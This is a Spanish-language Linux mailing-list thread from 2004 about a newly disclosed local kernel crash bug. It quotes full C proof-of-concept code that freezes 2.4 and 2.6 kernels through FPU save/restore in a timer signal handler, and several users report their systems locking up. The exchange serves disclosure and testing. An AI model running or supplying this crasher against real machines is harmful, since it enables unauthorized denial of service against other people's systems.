Gustavo Chaín wrote: >On Sat, 12 Jun 2004 14:56:08 -0400 >Felipe Covarrubias Hooper <[EMAIL PROTECTED]> wrote: > > > >>Gustavo Chaín wrote: >> >> >> >>>On Sat, 12 Jun 2004 14:14:56 -0400 >>>Gustavo Chaín <[EMAIL PROTECTED]> wrote: >>> >>> >>> >>> >>> >>>>El bug permite q un simple programa en C bloquee el sistema, afecta kernels >>>>2.4.2x and 2.6.x, el exploit fue reportado como un "gcc bug" >>>> >>>>Código >>>> >>>> #include <sys/time.h> >>>> #include <signal.h> >>>> #include <unistd.h> >>>> >>>> static void Handler(int ignore) >>>> { >>>> char fpubuf[108]; >>>> __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf)); >>>> write(2, "*", 1); >>>> __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf)); >>>> } >>>> >>>> int main(int argc, char *argv[]) >>>> { >>>> struct itimerval spec; >>>> signal(SIGALRM, Handler); >>>> spec.it_interval.tv_sec=0; >>>> spec.it_interval.tv_usec=100; >>>> spec.it_value.tv_sec=0; >>>> spec.it_value.tv_usec=100; >>>> setitimer(ITIMER_REAL, &spec, NULL); >>>> while(1) >>>> write(1, ".", 1); >>>> >>>> return 0; >>>> } >>>> >>>> El bug se "manifiesta si es compilado con las versiones 3.2 o 3.3 de gcc >>>> >>>>Los kernels q se salvan... >>>> >>>>Aqui el código no hace nada, salvo enviar un error de excepcion en el coma >>>>flotante. >>>> >>>> * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith >>>> * Linux Kernel 2.6.4 SMP patched with staircase scheduler, Guille >>>> * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3) >>>> * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2) >>>> >>>>No está muy claro pq los parches de gentoo para kernels 2.4.26 estan a >>>>salvo de esto (fueron liberado antes de la publicacion del bug). Segun el >>>>redactor del articulo lo probo y no tuvo problemas >>>> >>>>I assumed this bug was no serious threat before everyone I asked to test >>>>this code confermed that it did, in fact, froze their systems. When I >>>>started testing kernels I found that every kernel I tried, 2.4.xx and >>>>2.6.xx, are affected except the ones I had already installed on my system. >>>>Even Linux 2.4.26-gentoo-r1 crashes. >>>> >>>>blabla ... >>>> >>>>al parecer la solucion es compilar 2.4.25 y parchar con gentoo. >>>> >>>> >>>> >>>>pseudo traducido de: >>>>http://www.todo-linux.com/go.php?pag=http://reviewed.homelinux.org/news/2004-06-11_kernel_crash/index.html.en >>>> >>>> >>>> >>>> >>>> >>>> >>>-_- ' funciona >>> >>> >>> >>> >>> >>Lo Probe en un kernel con parches de debian en la distribución Unstable, >>kernel version 2.4.26, y el sistema se paraliza por completo. >> >> >> > >pero una vez paralizado què?, reinicias y todo como si nunca hubiera pasado? > > > Así es no queda mas que reiniciar y en mi caso el sistema volvio a arrancar como siempre. ------------ próxima parte ------------ Se ha borrado un adjunto en formato HTML... URL: https://listas.inf.utfsm.cl/pipermail/linux/attachments/20040613/da6edd81/attachment-0001.htm From [EMAIL PROTECTED] Sun Jun 13 01:46:18 2004 From: [EMAIL PROTECTED] (JoNaHLoMu) Date: Sun Jun 13 01:43:48 2004 Subject: Kernel Crash-Exploit descubierto In-Reply-To: <[EMAIL PROTECTED]> References: <[EMAIL PROTECTED]> <[EMAIL PROTECTED]> <[EMAIL PROTECTED]> <[EMAIL PROTECTED]> <[EMAIL PROTECTED]> Message-ID: <[EMAIL PROTECTED]>
sin html porfavor...un poco de respeto hacia los demas...gracias El dom, 13-06-2004 a las 00:35, Felipe Covarrubias Hooper escribió: > > > Así es no queda mas que reiniciar y en mi caso el sistema volvio a > arrancar como siempre. -- ------------------------------------------------------------- Usuario Linux #325770 Viña del Mar http://counter.li.org Chile J o N a H L o M u